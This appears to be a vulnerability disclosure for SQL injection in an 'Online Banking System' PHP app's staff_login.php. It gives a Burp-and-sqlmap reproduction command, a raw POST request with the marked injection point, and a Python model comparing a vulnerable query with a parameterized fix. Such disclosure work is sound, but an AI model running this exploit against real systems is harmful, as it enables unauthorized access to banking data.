Online Banking System SQL Injection
Description => SQL injection at staff_login.php
Steps to Reproduce
Staff Login -> Staff ID -> Staff Password -> Login -> modify data -> sqlmap
Exploit
- Input Staff ID and Staff Password -> Login
- Use Burp Suite to capture the request

- Then modify the data and save it as sqli.txt
- Scan sqli.txt with sqlmap
python3 sqlmap.py -r sqli.txt --batch --current-user
Vulnerable Code
- No filtering of Staff ID and Staff Password when inserting the data into the database query
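To show what "no filter" means in practice, here is an added Python/sqlite3 model of the login (not the project's PHP code; the staff table and its columns are assumptions). It puts the concatenated query beside a parameterized one and includes the probe a reviewer uses to confirm that user input is reaching the SQL parser: a lone quote in Staff ID breaks the vulnerable query but is plain data to the fixed one.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the application's staff table
    # (table and column names are assumptions, not taken from the project).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE staff (staff_id TEXT, password TEXT, name TEXT)")
    conn.execute("INSERT INTO staff VALUES ('S001', 'correct-horse', 'Alice')")
    conn.commit()
    return conn


def vulnerable_login(conn, staff_id, password):
    # Mirrors the reported defect: both form fields are pasted straight
    # into the SQL text, so quotes in them become part of the query.
    sql = (f"SELECT name FROM staff WHERE staff_id = '{staff_id}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, staff_id, password):
    # Parameterized query: the driver passes the values separately from the
    # statement, so quotes or keywords in either field are data, never structure.
    sql = "SELECT name FROM staff WHERE staff_id = ? AND password = ?"
    row = conn.execute(sql, (staff_id, password)).fetchone()
    return row[0] if row else None


def probe_reacts_to_quote(login):
    """Return True if a single quote appended to Staff ID makes the database
    throw a syntax error, i.e. the input reached the SQL parser. A database
    error on such a probe is the signal that marks staff_id as an injection
    point (and the kind of error a WAF or app log should be watched for)."""
    conn = make_db()
    try:
        login(conn, "S001'", "x")
    except sqlite3.OperationalError:
        return True
    return False
```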
Information Disclosure
POC
Injection Point
staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN
Request
POST /Online-Banking/staff_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN

